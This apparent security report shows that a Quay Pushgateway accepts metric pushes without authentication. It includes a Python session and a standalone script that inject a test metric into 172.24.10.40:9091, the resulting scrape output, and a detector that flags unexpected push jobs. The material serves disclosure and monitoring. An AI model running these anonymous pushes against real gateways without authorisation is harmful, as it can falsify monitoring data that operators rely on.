When Quay's Pushgateway is exposed publicly, anyone can push to the Pushgateway port without authentication, and the bogus metric is then visible in the list of metrics that can be scraped. One can show this with the following Python session (prometheus_client is the only dependency):
# python3
Python 3.7.3 (default, Jul 25 2020, 13:03:44)
[GCC 8.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> from prometheus_client import CollectorRegistry, Gauge, push_to_gateway
>>> registry = CollectorRegistry()
>>> g = Gauge('test_metric', 'Testing if pushing to pushgateway works without auth', registry=registry)
>>> g.set_to_current_time()
>>> push_to_gateway("172.24.10.40:9091", job='test-job', registry=registry)
>>>
This is the outcome:
# curl 172.24.10.40:9091/metrics | grep test
(curl progress meter omitted)
push_failure_time_seconds{instance="",job="test-job"} 0
push_time_seconds{instance="",job="test-job"} 1.5971371222892244e+09
# HELP quay_security_scanning_unscanned_images_remaining number of images that are not scanned by the latest security scanner
# HELP test_metric Testing if pushing to pushgateway works without auth
# TYPE test_metric gauge
test_metric{instance="",job="test-job"} 1.5971370937285342e+09
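The following is an added example, not part of the original report and not Quay's or Pushgateway's own code. It does two things the session above only hints at: it builds the Pushgateway push by hand with the standard library (the gateway accepts text-format metrics via PUT or POST to /metrics/job/<job>, which is what prometheus_client does under the hood, and no credentials are involved), and it checks a scraped /metrics page for push groups whose job label is not on an allow-list, using the push_time_seconds series the gateway adds for every group. The address 172.24.10.40:9091 is taken from the report; the job name "quay" in the allow-list and the sample scrape text are constructed for the example.

```python
"""Probe an exposed Pushgateway and spot metrics pushed by unexpected jobs.

Added example; assumptions: the gateway listens on PUSHGATEWAY, and legitimate
pushers use the job names listed in EXPECTED_JOBS ("quay" is a placeholder).
"""
import re
import urllib.error
import urllib.request

PUSHGATEWAY = "http://172.24.10.40:9091"   # address from the report
EXPECTED_JOBS = ["quay"]                    # assumed allow-list of legitimate pushers


def build_push_request(base_url, job, metric, value, help_text=""):
    """Return (url, body) for a Pushgateway push of a single gauge.

    The Pushgateway API takes metrics in the Prometheus text exposition
    format at /metrics/job/<job>; nothing in the request carries credentials.
    """
    body = ""
    if help_text:
        body += f"# HELP {metric} {help_text}\n"
    body += f"# TYPE {metric} gauge\n"
    body += f"{metric} {value}\n"
    return f"{base_url}/metrics/job/{job}", body


def push_unauthenticated(base_url, job, metric, value, timeout=5):
    """PUT the metric to the gateway and return the HTTP status code.

    A 2xx status means the gateway accepted an anonymous push; the metric will
    then be served on /metrics to whatever scrapes the gateway.
    """
    url, body = build_push_request(base_url, job, metric, value)
    req = urllib.request.Request(
        url, data=body.encode(), method="PUT",
        headers={"Content-Type": "text/plain; version=0.0.4"},
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


# Sample line: name{label="v",...} value   (comments and blank lines skipped)
_SAMPLE_RE = re.compile(r'^([A-Za-z_:][A-Za-z0-9_:]*)(\{[^}]*\})?\s+(\S+)')
_LABEL_RE = re.compile(r'([A-Za-z_][A-Za-z0-9_]*)="((?:[^"\\]|\\.)*)"')


def parse_exposition(text):
    """Parse text-format metrics into a list of (name, labels dict, value str)."""
    samples = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        match = _SAMPLE_RE.match(line)
        if not match:
            continue
        name, labels, value = match.groups()
        samples.append((name, dict(_LABEL_RE.findall(labels or "")), value))
    return samples


def foreign_jobs(scrape_text, expected_jobs):
    """Return job labels of push groups that are not in the allow-list.

    The gateway records push_time_seconds for every group it holds, so every
    pusher, legitimate or not, shows up there even if its own metric names
    look harmless.
    """
    seen = {labels["job"] for name, labels, _ in parse_exposition(scrape_text)
            if name == "push_time_seconds" and "job" in labels}
    return sorted(seen - set(expected_jobs))


# Constructed scrape output modelled on the report's grep result.
SAMPLE_SCRAPE = """\
# HELP push_time_seconds Last Unix time when changing this group in the Pushgateway succeeded.
# TYPE push_time_seconds gauge
push_time_seconds{instance="",job="quay"} 1.5971370000000000e+09
push_time_seconds{instance="",job="test-job"} 1.5971371222892244e+09
# HELP test_metric Testing if pushing to pushgateway works without auth
# TYPE test_metric gauge
test_metric{instance="",job="test-job"} 1.5971370937285342e+09
quay_security_scanning_unscanned_images_remaining{instance="",job="quay"} 0
"""


if __name__ == "__main__":
    # Live check against the gateway from the report (needs network access).
    status = push_unauthenticated(PUSHGATEWAY, "test-job", "test_metric", 1)
    print("push status:", status)
    with urllib.request.urlopen(f"{PUSHGATEWAY}/metrics", timeout=5) as resp:
        print("foreign jobs:", foreign_jobs(resp.read().decode(), EXPECTED_JOBS))
```

Running the script performs the same anonymous push as the REPL session and then lists every job on the gateway that is not in EXPECTED_JOBS; the same foreign_jobs check can be run against Prometheus' own scrape of the gateway to alert on injected groups.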
Please check!